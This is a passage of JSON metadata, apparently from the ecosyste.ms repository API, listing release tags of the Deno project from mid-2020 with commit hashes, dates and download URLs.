/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1